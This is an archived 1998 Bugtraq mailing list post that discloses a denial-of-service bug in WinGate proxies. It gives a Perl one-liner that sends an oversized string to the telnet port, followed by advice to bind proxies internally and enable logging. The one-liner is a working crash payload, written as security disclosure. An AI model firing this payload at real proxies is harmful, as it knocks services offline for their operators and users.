Bugtraq mailing list archives

crashing wingates

From: g23 () USA NET (G23)
Date: Sat, 14 Nov 1998 13:51:30 -0500


Hello,

The following one-liner will crash an open Wingate.

perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
->send("X" x 4400 . "\n",0)'

Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The 
above is my rendition of a 44 line sh script written by "rEWTED" (kefka () infected org).

Anyone configuring a proxy for LAN use should only bind to an internal
interface anyway.  (IE, kidz shouldn't even see your proxy)
http://wingate.net/helppages/wingate2Securing_your_network.html

If you do provide telnet proxy for the world, then at least log.
http://wingate.net/helppages/wingate2Auditing_and_Logging.html

ghost23



____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1

Current thread:

crashing wingates G23 (Nov 14)
- Re: crashing wingates Eric Wanner (Nov 14)
- Administrivia Aleph One (Nov 14)
  - Re: Administrivia Chris Tobkin (Nov 15)
  - SerialPOP DoS Philip Stoev (Nov 15)
- <Possible follow-ups>
- Re: crashing wingates Noam Rathaus (Nov 15)
- Re: crashing wingates Kotu Srinivasa Reddy (Nov 16)